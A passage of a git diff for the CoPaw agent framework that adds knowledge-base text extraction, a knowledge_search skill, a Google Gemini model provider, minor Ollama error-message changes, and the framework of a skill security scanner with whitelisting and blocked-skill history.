index/title. + for candidate in candidates: + subject = self._extract_subject_from_text(candidate) + if subject: + processed["subject"] = subject + break + return processed + + def _process_knowledge_text( + self, + text: str, + top_n: int = _KEYWORD_DEFAULT_TOP_N, + ) -> dict[str, Any]: + normalized = self._normalize_text(text or "") + if not normalized: + return { + "subject": "", + "summary": "", + "keywords": [], + } + + return { + "subject": self._extract_subject_from_text(normalized), + "summary": self._extract_summary_from_text(normalized), + "keywords": self._extract_keywords_from_text(normalized, top_n=top_n), + } + + def _collect_source_processing_text( + self, + source: KnowledgeSourceSpec, + config: KnowledgeConfig | None = None, + ) -> str: + candidates = self._collect_source_processing_candidates(source, config) + return self._normalize_text("\n".join(part for part in candidates if part)) + + def _collect_source_processing_candidates( + self, + source: KnowledgeSourceSpec, + config: KnowledgeConfig | None = None, + ) -> list[str]: + candidates: list[str] = [] + + if source.summary and source.summary.strip(): + candidates.append(source.summary) + if source.content and source.content.strip(): + candidates.append(source.content) + + indexed_payload = self._load_index_payload_safe(source.id) + if indexed_payload: + chunk_titles: list[str] = [] + chunk_texts: list[str] = [] + for chunk in indexed_payload.get("chunks", []): + if not isinstance(chunk, dict): + continue + chunk_title = chunk.get("document_title") + if isinstance(chunk_title, str) and chunk_title.strip(): + chunk_titles.append(chunk_title) + chunk_text = chunk.get("text") + if isinstance(chunk_text, str) and chunk_text.strip(): + chunk_texts.append(chunk_text) + + if chunk_titles: + candidates.append("\n".join(chunk_titles)) + if chunk_texts: + candidates.append("\n".join(chunk_texts)) + + location = (source.location or "").strip() + if source.type == "file" and location: + full_text = self._read_local_text(Path(location)) + if full_text: + candidates.append(full_text) + elif source.type == "directory" and location: + full_text = self._read_directory_text(Path(location), config) + if full_text: + candidates.append(full_text) + + return candidates + + def _read_local_text(self, path: Path) -> str: + try: + resolved = path.expanduser().resolve() + if not resolved.exists() or not resolved.is_file(): + return "" + raw = resolved.read_text(encoding="utf-8", errors="ignore") + return self._normalize_text(raw) + except Exception: + return "" + + def _read_directory_text( + self, + directory: Path, + config: KnowledgeConfig | None = None, + ) -> str: + try: + root = directory.expanduser().resolve() + if not root.exists() or not root.is_dir(): + return "" + parts: list[str] = [] + for path in root.rglob("*"): + if not path.is_file(): + continue + if config is not None: + relative = path.relative_to(root).as_posix() + if not self._is_allowed_path(relative, config): + continue + text = self._read_local_text(path) + if text: + parts.append(text) + return self._normalize_text("\n".join(parts)) + except Exception: + return "" + + def _load_index_payload_safe(self, source_id: str) -> dict[str, Any] | None: + index_path = self._source_index_path(source_id) + if not index_path.exists(): + return None + try: + return self._load_json(index_path) + except Exception: + return None + + def _read_local_text_snippet(self, path: Path, max_chars: int = 2400) -> str: + try: + resolved = path.expanduser().resolve() + if not resolved.exists() or not resolved.is_file(): + return "" + raw = resolved.read_text(encoding="utf-8", errors="ignore") + return self._normalize_text(raw[:max_chars]) + except Exception: + return "" + + def _read_directory_text_snippet(self, directory: Path, max_chars: int = 2400) -> str: + try: + root = directory.expanduser().resolve() + if not root.exists() or not root.is_dir(): + return "" + for path in root.rglob("*"): + if not path.is_file(): + continue + snippet = self._read_local_text_snippet(path, max_chars=max_chars) + if snippet: + return snippet + except Exception: + return "" + return "" + + def _semantic_title_from_text(self, text: str) -> str: + normalized = self._normalize_text(text or "") + if not normalized: + return "" + + sentences = [ + s.strip(" \t-::;;,.。!?!?") + for s in _TITLE_SENTENCE_SPLIT_RE.split(normalized) + if s.strip() + ] + if not sentences: + return "" + + token_freq: dict[str, int] = {} + sentence_tokens: list[list[str]] = [] + for sentence in sentences: + tokens = self._tokenize_text(sentence) + sentence_tokens.append(tokens) + for token in tokens: + token_freq[token] = token_freq.get(token, 0) + 1 + + best_sentence = "" + best_score = -1.0 + for sentence, tokens in zip(sentences, sentence_tokens): + if not tokens: + score = 0.0 + else: + unique_score = sum(token_freq.get(token, 0) for token in set(tokens)) + score = unique_score / (len(tokens) ** 0.5) + if score > best_score: + best_score = score + best_sentence = sentence + + if not best_sentence: + best_sentence = sentences[0] + return self._normalize_text(best_sentence) + + def _extract_subject_from_text(self, text: str) -> str: + return self._semantic_title_from_text(text) + + def _extract_summary_from_text(self, text: str) -> str: + # Keep the summary extractor independent for future tuning. + return self._semantic_title_from_text(text) + + @staticmethod + def _tokenize_text(text: str) -> list[str]: + normalized = re.sub(r"\s+", " ", (text or "").strip()) + if not normalized: + return [] + + raw_tokens: list[str] = [] + + if jieba is not None: + try: + raw_tokens = [str(tok) for tok in jieba.lcut(normalized)] + except Exception: + raw_tokens = [] + elif hanlp is not None: + for attr in ("tokenize", "tok"): + fn = getattr(hanlp, attr, None) + if not callable(fn): + continue + try: + result = fn(normalized) + if isinstance(result, list): + raw_tokens = [str(tok) for tok in result] + elif isinstance(result, tuple): + raw_tokens = [str(tok) for tok in result] + if raw_tokens: + break + except Exception: + continue + + if not raw_tokens: + raw_tokens = _SEMANTIC_TOKEN_RE.findall(normalized) + + tokens: list[str] = [] + for raw in raw_tokens: + token = str(raw).strip().lower() + if not token: + continue + if not _SEMANTIC_TOKEN_RE.fullmatch(token): + continue + if token in _SEMANTIC_STOP_WORDS: + continue + tokens.append(token) + return tokens + + def _extract_keywords_from_text(self, text: str, top_n: int = 3) -> list[str]: + tokens = self._tokenize_text(text) + if not tokens or top_n <= 0: + return [] + + freq = Counter(tokens) + ranked = sorted(freq.items(), key=lambda item: (-item[1], item[0])) + return [token for token, _ in ranked[:top_n]] + + @staticmethod + def _truncate_title(value: str, max_len: int = 120) -> str: + compact = re.sub(r"\s+", " ", (value or "").strip()) + if not compact: + compact = "knowledge" + if len(compact) <= max_len: + return compact + return compact[: max_len - 3].rstrip() + "..." + + @staticmethod + def _truncate_summary(value: str, max_len: int = 180) -> str: + compact = re.sub(r"\s+", " ", (value or "").strip()) + if not compact: + return "" + if len(compact) <= max_len: + return compact + return compact[: max_len - 3].rstrip() + "..." + + @staticmethod + def _chunk_documents( + documents: list[dict[str, str]], + chunk_size: int, + ) -> list[dict[str, Any]]: + chunks: list[dict[str, Any]] = [] + for document in documents: + text = document["text"] + if not text: + continue + for index, start in enumerate(range(0, len(text), chunk_size)): + chunk_text = text[start : start + chunk_size] + if not chunk_text.strip(): + continue + chunks.append( + { + "chunk_id": f"{document['path']}::{index}", + "document_path": document["path"], + "document_title": document["title"], + "text": chunk_text, + }, + ) + return chunks + + @staticmethod + def _score_chunk(text: str, terms: list[str]) -> int: + lowered = text.lower() + score = 0 + phrase = " ".join(terms) + if phrase and phrase in lowered: + score += len(terms) + 2 + for term in terms: + score += lowered.count(term) + return score + + @staticmethod + def _build_snippet(text: str, terms: list[str], length: int = 240) -> str: + lowered = text.lower() + position = 0 + for term in terms: + found = lowered.find(term) + if found >= 0: + position = found + break + start = max(position - 60, 0) + end = min(start + length, len(text)) + return text[start:end].strip() + + @staticmethod + def _is_allowed_path(relative_path: str, config: KnowledgeConfig) -> bool: + normalized = relative_path.strip("/") + if any( + fnmatch.fnmatch(normalized, pattern) + for pattern in config.index.exclude_globs + ): + return False + if not config.index.include_globs: + return True + return any( + fnmatch.fnmatch(normalized, pattern) + or fnmatch.fnmatch(f"./{normalized}", pattern) + for pattern in config.index.include_globs + ) + + @staticmethod + def _safe_name(value: str) -> str: + safe = re.sub(r"[^A-Za-z0-9._-]+", "-", value).strip("-.") + return safe or "knowledge" + + @staticmethod + def _session_filename(session_id: str, user_id: str) -> str: + safe_sid = _sanitize_filename(session_id) + safe_uid = _sanitize_filename(user_id) if user_id else "" + if safe_uid: + return f"{safe_uid}_{safe_sid}.json" + return f"{safe_sid}.json" \ No newline at end of file diff --git a/src/copaw/knowledge/module_skills.py b/src/copaw/knowledge/module_skills.py new file mode 100644 index 000000000..3d8a487f9 --- /dev/null +++ b/src/copaw/knowledge/module_skills.py @@ -0,0 +1,23 @@ +# -*- coding: utf-8 -*- + +from pathlib import Path + +from ..agents.skills_manager import SkillService, sync_skill_dir_to_active + + +KNOWLEDGE_MODULE_SKILLS_DIR = Path(__file__).parent / "skills" +KNOWLEDGE_MODULE_SKILL_NAMES = ("knowledge_search_assistant",) + + +def sync_knowledge_module_skills(enabled: bool) -> None: + """Keep knowledge module skills aligned with the runtime enabled state.""" + for skill_name in KNOWLEDGE_MODULE_SKILL_NAMES: + if enabled: + skill_dir = KNOWLEDGE_MODULE_SKILLS_DIR / skill_name + if not sync_skill_dir_to_active(skill_dir, force=True): + raise RuntimeError( + f"Failed to enable knowledge module skill: {skill_name}" + ) + continue + + SkillService.disable_skill(skill_name) \ No newline at end of file diff --git a/src/copaw/knowledge/skills/knowledge_search_assistant/SKILL.md b/src/copaw/knowledge/skills/knowledge_search_assistant/SKILL.md new file mode 100644 index 000000000..448d481ab --- /dev/null +++ b/src/copaw/knowledge/skills/knowledge_search_assistant/SKILL.md @@ -0,0 +1,42 @@ +--- +name: knowledge_search_assistant +description: "Use knowledge_search proactively when the user is asking about existing project facts, process notes, prior decisions, archived materials, or whether the knowledge base already contains something relevant." +metadata: + { + "copaw": + { + "emoji": ":books:", + "requires": {} + } + } +--- + +# Knowledge Search Assistant + +Use this skill when the user's question is likely answered by existing knowledge base content. Prefer checking knowledge_search before answering from memory. + +## Trigger Signals + +- The user asks whether the knowledge base, docs, or prior notes already contain something. +- The user is asking for established project facts, conventions, workflows, or historical decisions. +- The user is requesting grounded recall rather than fresh synthesis. + +## Suggested Flow + +1. Extract a short search phrase from the user's request. +2. Call knowledge_search with the original question or a shorter query. +3. If the first search is weak, retry once with fewer keywords. +4. Answer from the retrieved evidence when available. +5. If nothing useful is found, say that no relevant knowledge was found. + +## Response Rules + +- Treat search hits as evidence and summarize them accurately. +- Do not present guesses as stored facts. +- If the user asks "do we already have this", answer the retrieval result first. + +## Do Not Use + +- Pure code editing, debugging, testing, or build tasks that need direct workspace inspection instead. +- General conversation that clearly does not depend on stored knowledge. +- Cases where the user explicitly says not to use the knowledge base. diff --git a/src/copaw/providers/gemini_provider.py b/src/copaw/providers/gemini_provider.py new file mode 100644 index 000000000..9788678ba --- /dev/null +++ b/src/copaw/providers/gemini_provider.py @@ -0,0 +1,130 @@ +# -*- coding: utf-8 -*- +"""A Google Gemini provider implementation using AgentScope's native +GeminiChatModel.""" + +from __future__ import annotations + +from typing import Any, List + +from agentscope.model import ChatModelBase +from google import genai +from google.genai import errors as genai_errors +from google.genai import types as genai_types + +from copaw.providers.provider import ModelInfo, Provider + + +class GeminiProvider(Provider): + """Provider implementation for Google Gemini API.""" + + def _client(self, timeout: float = 10) -> Any: + return genai.Client( + api_key=self.api_key, + http_options=genai_types.HttpOptions(timeout=int(timeout * 1000)), + ) + + @staticmethod + def _normalize_models_payload(payload: Any) -> List[ModelInfo]: + models: List[ModelInfo] = [] + for row in payload or []: + model_id = str(getattr(row, "name", "") or "").strip() + + if not model_id: + continue + + # Gemini API returns model names like "models/gemini-2.5-flash" + # Strip the "models/" prefix for cleaner IDs + if model_id.startswith("models/"): + model_id = model_id[len("models/") :] + + display_name = str( + getattr(row, "display_name", "") or model_id, + ).strip() + + if not display_name or display_name.startswith("models/"): + display_name = model_id + + models.append(ModelInfo(id=model_id, name=display_name)) + + deduped: List[ModelInfo] = [] + seen: set[str] = set() + for model in models: + if model.id in seen: + continue + seen.add(model.id) + deduped.append(model) + return deduped + + async def check_connection(self, timeout: float = 10) -> tuple[bool, str]: + """Check if Google Gemini provider is reachable.""" + try: + client = self._client(timeout=timeout) + # Use the async list models endpoint to verify connectivity + async for _ in await client.aio.models.list(): + break + return True, "" + except genai_errors.APIError: + return ( + False, + "Failed to connect to Google Gemini API. " + "Check your API key.", + ) + except Exception: + return ( + False, + "Unknown exception when connecting to Google Gemini API.", + ) + + async def fetch_models(self, timeout: float = 10) -> List[ModelInfo]: + """Fetch available models from Gemini API.""" + try: + client = self._client(timeout=timeout) + payload = [] + async for model in await client.aio.models.list(): + payload.append(model) + models = self._normalize_models_payload(payload) + return models + except genai_errors.APIError: + return [] + except Exception: + return [] + + async def check_model_connection( + self, + model_id: str, + timeout: float = 10, + ) -> tuple[bool, str]: + """Check if a specific Gemini model is reachable/usable.""" + target = (model_id or "").strip() + if not target: + return False, "Empty model ID" + + try: + client = self._client(timeout=timeout) + response = await client.aio.models.generate_content_stream( + model=target, + contents="ping", + ) + async for _ in response: + break + return True, "" + except genai_errors.APIError: + return ( + False, + f"Model '{model_id}' is not reachable or usable", + ) + except Exception: + return ( + False, + f"Unknown exception when connecting to model '{model_id}'", + ) + + def get_chat_model_instance(self, model_id: str) -> ChatModelBase: + from agentscope.model import GeminiChatModel + + return GeminiChatModel( + model_name=model_id, + stream=True, + api_key=self.api_key, + generate_kwargs=self.generate_kwargs, + ) diff --git a/src/copaw/providers/ollama_provider.py b/src/copaw/providers/ollama_provider.py index 159960671..893f46ad1 100644 --- a/src/copaw/providers/ollama_provider.py +++ b/src/copaw/providers/ollama_provider.py @@ -22,7 +22,7 @@ class OllamaProvider(Provider): def model_post_init(self, __context: Any) -> None: if not self.base_url: # type: ignore self.base_url = ( - os.environ.get("OLLAMA_HOST") or "http://localhost:11434" + os.environ.get("OLLAMA_HOST") or "http://127.0.0.1:11434" ) if self.base_url.endswith("/v1"): # For backwards compatibility, if the URL ends with /v1, @@ -76,10 +76,10 @@ async def check_connection(self, timeout: float = 5) -> tuple[bool, str]: return False, "Ollama Python SDK is not installed" except ConnectionError: return False, f"Failed to connect to Ollama at `{self.base_url}`" - except Exception: + except Exception as exc: return ( False, - f"Unknown exception when connecting to `{self.base_url}`", + f"Failed to connect to Ollama at `{self.base_url}`: {exc}", ) async def fetch_models(self, timeout: float = 5) -> List[ModelInfo]: @@ -113,8 +113,8 @@ async def check_model_connection( return False, "Ollama Python SDK is not installed" except ConnectionError: return False, f"Failed to connect to Ollama at `{self.base_url}`" - except Exception: - return False, f"Unknown exception when connecting to `{target}`" + except Exception as exc: + return False, f"Model connection failed for `{target}`: {exc}" async def add_model( self, diff --git a/src/copaw/providers/provider_manager.py b/src/copaw/providers/provider_manager.py index 62a329c1b..3571aac47 100644 --- a/src/copaw/providers/provider_manager.py +++ b/src/copaw/providers/provider_manager.py @@ -9,7 +9,7 @@ import logging import json -from pydantic import BaseModel, Field +from pydantic import BaseModel from agentscope.model import ChatModelBase @@ -19,8 +19,10 @@ Provider, ProviderInfo, ) +from copaw.providers.models import ModelSlotConfig from copaw.providers.openai_provider import OpenAIProvider from copaw.providers.anthropic_provider import AnthropicProvider +from copaw.providers.gemini_provider import GeminiProvider from copaw.providers.ollama_provider import OllamaProvider from copaw.constant import SECRET_DIR from copaw.local_models import create_local_chat_model @@ -97,6 +99,19 @@ ANTHROPIC_MODELS: List[ModelInfo] = [] +GEMINI_MODELS: List[ModelInfo] = [ + ModelInfo(id="gemini-3.1-pro-preview", name="Gemini 3.1 Pro Preview"), + ModelInfo(id="gemini-3-flash-preview", name="Gemini 3 Flash Preview"), + ModelInfo( + id="gemini-3.1-flash-lite-preview", + name="Gemini 3.1 Flash Lite Preview", + ), + ModelInfo(id="gemini-2.5-pro", name="Gemini 2.5 Pro"), + ModelInfo(id="gemini-2.5-flash", name="Gemini 2.5 Flash"), + ModelInfo(id="gemini-2.5-flash-lite", name="Gemini 2.5 Flash Lite"), + ModelInfo(id="gemini-2.0-flash", name="Gemini 2.0 Flash"), +] + PROVIDER_MODELSCOPE = OpenAIProvider( id="modelscope", name="ModelScope", @@ -183,6 +198,17 @@ freeze_url=True, ) +PROVIDER_GEMINI = GeminiProvider( + id="gemini", + name="Google Gemini", + base_url="https://generativelanguage.googleapis.com", + api_key_prefix="", + models=GEMINI_MODELS, + chat_model="GeminiChatModel", + freeze_url=True, + support_model_discovery=True, +) + PROVIDER_OLLAMA = OllamaProvider( id="ollama", name="Ollama", @@ -202,17 +228,6 @@ ) -class ModelSlotConfig(BaseModel): - provider_id: str = Field( - ..., - description="ID of the provider to use for this model slot", - ) - model: str = Field( - ..., - description="ID of the model to use for this model slot", - ) - - class ActiveModelsInfo(BaseModel): active_llm: ModelSlotConfig | None @@ -259,6 +274,7 @@ def _init_builtins(self): self._add_builtin(PROVIDER_MINIMAX) self._add_builtin(PROVIDER_DEEPSEEK) self._add_builtin(PROVIDER_ANTHROPIC) + self._add_builtin(PROVIDER_GEMINI) self._add_builtin(PROVIDER_OLLAMA) self._add_builtin(PROVIDER_LMSTUDIO) self._add_builtin(PROVIDER_LLAMACPP) @@ -469,6 +485,8 @@ def _provider_from_data(self, data: Dict) -> Provider: if provider_id == "anthropic" or chat_model == "AnthropicChatModel": return AnthropicProvider.model_validate(data) + if provider_id == "gemini" or chat_model == "GeminiChatModel": + return GeminiProvider.model_validate(data) if provider_id == "ollama": return OllamaProvider.model_validate(data) if data.get("is_local", False): diff --git a/src/copaw/security/__init__.py b/src/copaw/security/__init__.py index d2367e231..61e1d0674 100644 --- a/src/copaw/security/__init__.py +++ b/src/copaw/security/__init__.py @@ -7,6 +7,8 @@ * **Tool-call guarding** (``copaw.security.tool_guard``) Pre-execution parameter scanning to detect dangerous tool usage patterns (command injection, data exfiltration, etc.). +* **Skill scanning** (``copaw.security.skill_scanner``) + Static analysis of skill directories before install / activation. Sub-modules are kept independent so each concern can evolve (or be disabled) without affecting the others. Import-time cost is near-zero diff --git a/src/copaw/security/skill_scanner/__init__.py b/src/copaw/security/skill_scanner/__init__.py new file mode 100644 index 000000000..bf153a9ef --- /dev/null +++ b/src/copaw/security/skill_scanner/__init__.py @@ -0,0 +1,504 @@ +# -*- coding: utf-8 -*- +""" +Skill security scanner for CoPaw. + +Scans skills for security threats before they are activated or installed. + +Architecture +~~~~~~~~~~~~ + +The scanner follows a lightweight, extensible design: + +* **BaseAnalyzer** - abstract interface every analyzer must implement. +* **PatternAnalyzer** - YAML regex-signature matching (fast, line-based). +* **SkillScanner** - orchestrator that runs registered analyzers and + aggregates findings into a :class:`ScanResult`. + +This branch intentionally ships the baseline pattern analyzer only. +Additional analyzers can be plugged in later without changing the +orchestrator. + +Quick start:: + + from copaw.security.skill_scanner import SkillScanner + + scanner = SkillScanner() + result = scanner.scan_skill("/path/to/skill_directory") + if not result.is_safe: + print(f"Blocked: {result.max_severity.value} findings detected") +""" +from __future__ import annotations + +from concurrent import futures +import hashlib +import json +import logging +import os +import threading +from dataclasses import dataclass, field +from datetime import datetime, timezone +from pathlib import Path +from typing import Any + +from .models import ( + Finding, + ScanResult, + Severity, + SkillFile, + ThreatCategory, +) +from .scan_policy import ScanPolicy +from .analyzers import BaseAnalyzer +from .analyzers.pattern_analyzer import PatternAnalyzer +from .scanner import SkillScanner + +logger = logging.getLogger(__name__) + +__all__ = [ + "BaseAnalyzer", + "BlockedSkillRecord", + "Finding", + "PatternAnalyzer", + "ScanPolicy", + "ScanResult", + "Severity", + "SkillFile", + "SkillScanner", + "SkillScanError", + "ThreatCategory", + "compute_skill_content_hash", + "get_blocked_history", + "clear_blocked_history", + "remove_blocked_entry", + "is_skill_whitelisted", + "scan_skill_directory", +] + +# --------------------------------------------------------------------------- +# Config helpers +# --------------------------------------------------------------------------- + + +_VALID_MODES = {"block", "warn", "off"} + + +def _load_scanner_config() -> Any: + """Load SkillScannerConfig from the app config (lazy import).""" + try: + from ...config import load_config + + return load_config().security.skill_scanner + except Exception: + return None + + +def _get_scan_mode(cfg: Any = None) -> str: + """Return the effective scan mode: ``block``, ``warn``, or ``off``. + + Priority: env ``COPAW_SKILL_SCAN_MODE`` > config > default ``warn``. + """ + env = os.environ.get("COPAW_SKILL_SCAN_MODE") + if env is not None: + val = env.lower().strip() + if val in _VALID_MODES: + return val + if cfg is None: + cfg = _load_scanner_config() + return cfg.mode if cfg is not None else "block" + + +def _scan_timeout(cfg: Any = None) -> float: + if cfg is None: + cfg = _load_scanner_config() + return float(cfg.timeout) if cfg is not None else 30.0 + + +# --------------------------------------------------------------------------- +# Content hash +# --------------------------------------------------------------------------- + + +def compute_skill_content_hash(skill_dir: Path) -> str: + """SHA-256 hash of all regular file contents in *skill_dir* (sorted).""" + h = hashlib.sha256() + try: + for p in sorted(skill_dir.rglob("*")): + if p.is_file() and not p.is_symlink(): + try: + h.update(p.read_bytes()) + except OSError: + pass + except OSError: + pass + return h.hexdigest() + + +# --------------------------------------------------------------------------- +# Whitelist helpers +# --------------------------------------------------------------------------- + + +def is_skill_whitelisted( + skill_name: str, + skill_dir: Path | None = None, + *, + cfg: Any = None, +) -> bool: + """Return True if *skill_name* is on the whitelist. + + When a whitelist entry has a non-empty ``content_hash``, the hash must + match the current directory contents for the entry to apply. + """ + if cfg is None: + cfg = _load_scanner_config() + if cfg is None: + return False + for entry in cfg.whitelist: + if entry.skill_name != skill_name: + continue + if not entry.content_hash: + return True + if skill_dir is not None: + current_hash = compute_skill_content_hash(skill_dir) + if current_hash == entry.content_hash: + return True + else: + return True + return False + + +# --------------------------------------------------------------------------- +# Blocked history persistence +# --------------------------------------------------------------------------- + +_BLOCKED_HISTORY_FILE = "skill_scanner_blocked.json" +_history_lock = threading.Lock() + + +def _get_blocked_history_path() -> Path: + try: + from ...constant import WORKING_DIR + + return WORKING_DIR / _BLOCKED_HISTORY_FILE + except Exception: + return Path.home() / ".copaw" / _BLOCKED_HISTORY_FILE + + +@dataclass +class BlockedSkillRecord: + """A record of a scan alert (blocked or warned).""" + + skill_name: str + blocked_at: str + max_severity: str + findings: list[dict[str, Any]] = field(default_factory=list) + content_hash: str = "" + action: str = "blocked" + + def to_dict(self) -> dict[str, Any]: + return { + "skill_name": self.skill_name, + "blocked_at": self.blocked_at, + "max_severity": self.max_severity, + "findings": self.findings, + "content_hash": self.content_hash, + "action": self.action, + } + + @classmethod + def from_dict(cls, data: dict[str, Any]) -> BlockedSkillRecord: + return cls( + skill_name=data.get("skill_name", ""), + blocked_at=data.get("blocked_at", ""), + max_severity=data.get("max_severity", ""), + findings=data.get("findings", []), + content_hash=data.get("content_hash", ""), + action=data.get("action", "blocked"), + ) + + +def _finding_to_dict(f: Finding) -> dict[str, Any]: + return { + "severity": f.severity.value, + "title": f.title, + "description": f.description, + "file_path": f.file_path, + "line_number": f.line_number, + "rule_id": f.rule_id, + } + + +def _record_blocked_skill( + result: ScanResult, + skill_dir: Path, + *, + action: str = "blocked", +) -> None: + """Append a scan alert to the history file.""" + record = BlockedSkillRecord( + skill_name=result.skill_name, + blocked_at=datetime.now(timezone.utc).isoformat(), + max_severity=result.max_severity.value, + findings=[_finding_to_dict(f) for f in result.findings], + content_hash=compute_skill_content_hash(skill_dir), + action=action, + ) + path = _get_blocked_history_path() + with _history_lock: + try: + existing: list[dict[str, Any]] = [] + if path.is_file(): + existing = json.loads(path.read_text(encoding="utf-8")) + existing.append(record.to_dict()) + path.parent.mkdir(parents=True, exist_ok=True) + path.write_text( + json.dumps(existing, indent=2, ensure_ascii=False), + encoding="utf-8", + ) + except Exception as exc: + logger.warning("Failed to record blocked skill: %s", exc) + + +def get_blocked_history() -> list[BlockedSkillRecord]: + """Load all blocked skill records from disk.""" + path = _get_blocked_history_path() + if not path.is_file(): + return [] + try: + data = json.loads(path.read_text(encoding="utf-8")) + return [BlockedSkillRecord.from_dict(d) for d in data] + except Exception as exc: + logger.warning("Failed to load blocked history: %s", exc) + return [] + + +def clear_blocked_history() -> None: + """Delete all blocked skill records.""" + path = _get_blocked_history_path() + try: + if path.is_file(): + path.unlink() + except OSError as exc: + logger.warning("Failed to clear blocked history: %s", exc) + + +def remove_blocked_entry(index: int) -> bool: + """Remove a single blocked record by index. Returns True on success.""" + path = _get_blocked_history_path() + if not path.is_file(): + return False + try: + data = json.loads(path.read_text(encoding="utf-8")) + if 0 <= index < len(data): + data.pop(index) + path.write_text( + json.dumps(data, indent=2, ensure_ascii=False), + encoding="utf-8", + ) + return True + return False + except Exception as exc: + logger.warning("Failed to remove blocked entry: %s", exc) + return False + + +# --------------------------------------------------------------------------- +# Lazy singleton (thread-safe) +# --------------------------------------------------------------------------- + +_scanner_instance: SkillScanner | None = None +_scanner_lock = threading.Lock() + + +def _get_scanner() -> SkillScanner: + """Return a lazily-initialised :class:`SkillScanner` singleton.""" + global _scanner_instance + if _scanner_instance is None: + with _scanner_lock: + if _scanner_instance is None: + _scanner_instance = SkillScanner() + return _scanner_instance + + +# --------------------------------------------------------------------------- +# Scan result cache (mtime-based) +# --------------------------------------------------------------------------- + +_MAX_CACHE_ENTRIES = 64 +_scan_cache: dict[str, tuple[float, ScanResult]] = {} +_cache_lock = threading.Lock() + + +def _get_dir_mtime(skill_dir: Path) -> float: + """Return the latest mtime among the directory and its immediate files.""" + try: + latest = skill_dir.stat().st_mtime + except OSError: + return 0.0 + try: + for p in skill_dir.iterdir(): + if p.is_file() and not p.is_symlink(): + latest = max(latest, p.stat().st_mtime) + except OSError: + pass + return latest + + +def _get_cached_result( + skill_dir: Path, +) -> ScanResult | None: + """Return a cached ScanResult if the directory hasn't changed.""" + key = str(skill_dir) + with _cache_lock: + entry = _scan_cache.get(key) + if entry is None: + return None + cached_mtime, cached_result = entry + current_mtime = _get_dir_mtime(skill_dir) + if current_mtime == cached_mtime: + logger.debug( + "Returning cached scan result for '%s'", + cached_result.skill_name, + ) + return cached_result + return None + + +def _store_cached_result( + skill_dir: Path, + result: ScanResult, +) -> None: + """Store a scan result in the cache (LRU eviction).""" + key = str(skill_dir) + mtime = _get_dir_mtime(skill_dir) + with _cache_lock: + _scan_cache.pop(key, None) + _scan_cache[key] = (mtime, result) + while len(_scan_cache) > _MAX_CACHE_ENTRIES: + oldest = next(iter(_scan_cache)) + del _scan_cache[oldest] + + +# --------------------------------------------------------------------------- +# Public API +# --------------------------------------------------------------------------- + + +def _format_finding_location(f: Finding) -> str: + if f.line_number is not None: + return f"({f.file_path}:{f.line_number})" + return f"({f.file_path})" + + +class SkillScanError(Exception): + """Raised when a skill fails a security scan and blocking is enabled.""" + + def __init__(self, result: ScanResult) -> None: + self.result = result + findings_summary = "; ".join( + f"[{f.severity.value}] {f.title} " f"{_format_finding_location(f)}" + for f in result.findings[:5] + ) + truncated = ( + f" (and {len(result.findings) - 5} more)" + if len(result.findings) > 5 + else "" + ) + super().__init__( + f"Security scan of skill '{result.skill_name}' found " + f"{len(result.findings)} issue(s) " + f"(max severity: {result.max_severity.value}): " + f"{findings_summary}{truncated}", + ) + + +def scan_skill_directory( + skill_dir: str | Path, + *, + skill_name: str | None = None, + block: bool | None = None, + timeout: float | None = None, +) -> ScanResult | None: + """Scan a skill directory and optionally block on unsafe results. + + Parameters + ---------- + skill_dir: + Path to the skill directory to scan. + skill_name: + Human-readable name (falls back to directory name). + block: + Whether to raise :class:`SkillScanError` when the scan finds + CRITICAL/HIGH issues. *None* means use the configured mode + (``block`` mode → True, ``warn`` mode → False). + timeout: + Maximum seconds to wait for the scan to complete before + giving up and returning ``None``. *None* reads from config. + + Returns + ------- + ScanResult or None + ``None`` when scanning is disabled, whitelisted, or timed out. + + Raises + ------ + SkillScanError + When blocking is enabled and the skill is deemed unsafe. + """ + cfg = _load_scanner_config() + mode = _get_scan_mode(cfg) + if mode == "off": + return None + + resolved = Path(skill_dir).resolve() + effective_name = skill_name or resolved.name + + if is_skill_whitelisted(effective_name, resolved, cfg=cfg): + logger.debug( + "Skill '%s' is whitelisted, skipping scan", + effective_name, + ) + return None + + effective_timeout = timeout if timeout is not None else _scan_timeout(cfg) + + cached = _get_cached_result(resolved) + if cached is not None: + result = cached + else: + scanner = _get_scanner() + + with futures.ThreadPoolExecutor(max_workers=1) as executor: + future = executor.submit( + scanner.scan_skill, + resolved, + skill_name=skill_name, + ) + try: + result = future.result(timeout=effective_timeout) + except futures.TimeoutError: + logger.warning( + "Security scan of skill '%s' timed out after %.0fs", + effective_name, + effective_timeout, + ) + future.cancel() + return None + + _store_cached_result(resolved, result) + + if not result.is_safe: + should_block = block if block is not None else (mode == "block") + if should_block: + _record_blocked_skill(result, resolved, action="blocked") + raise SkillScanError(result) + _record_blocked_skill(result, resolved, action="warned") + logger.warning( + "Skill '%s' has %d security finding(s) (max severity: %s) " + "but blocking is disabled – proceeding anyway.", + result.skill_name, + len(result.findings), + result.max_severity.value, + ) + + return result diff --git a/src/copaw/security/skill_scanner/analyzers/__init__.py b/src/copaw/security/skill_scanner/analyzers/__init__.py new file mode 100644 index 000000000..8096c3712 --- /dev/null +++ b/src/copaw/security/skill_scanner/analyzers/__init__.py @@ -0,0 +1,89 @@ +# -*- coding: utf-8 -*- +"""Abstract base class for all security analyzers. + +Every analyzer must subclass :class:`BaseAnalyzer` and implement +:meth:`analyze`. The interface is intentionally minimal so that +new detection engines (e.g. LLM-based, behavioural dataflow) can be +added as drop-in plugins without touching the scanner orchestrator. +""" +from __future__ import annotations + +from abc import ABC, abstractmethod +from pathlib import Path +from typing import TYPE_CHECKING + +from ..models import Finding, SkillFile + +if TYPE_CHECKING: + from ..scan_policy import ScanPolicy + + +class BaseAnalyzer(ABC): + """Abstract base class for all security analyzers. + + Parameters + ---------- + name: + Human-readable analyzer name (used in :attr:`Finding.analyzer`). + policy: + Optional :class:`ScanPolicy` for org-specific rule scoping, + severity overrides, and allowlists. When *None*, analysers + use their own built-in defaults. + """ + + def __init__( + self, + name: str, + *, + policy: "ScanPolicy | None" = None, + ) -> None: + self.name = name + # Lazily import to avoid circular dependencies + if policy is None: + from ..scan_policy import ScanPolicy + + policy = ScanPolicy.default() + self._policy = policy + + @property + def policy(self) -> "ScanPolicy": + """The active scan policy.""" + return self._policy + + # ------------------------------------------------------------------ + # Abstract interface + # ------------------------------------------------------------------ + + @abstractmethod + def analyze( + self, + skill_dir: Path, + files: list[SkillFile], + *, + skill_name: str | None = None, + ) -> list[Finding]: + """Analyze a skill package for security issues. + + Parameters + ---------- + skill_dir: + Root directory of the skill. + files: + Pre-discovered list of :class:`SkillFile` objects belonging + to the skill. + skill_name: + Optional 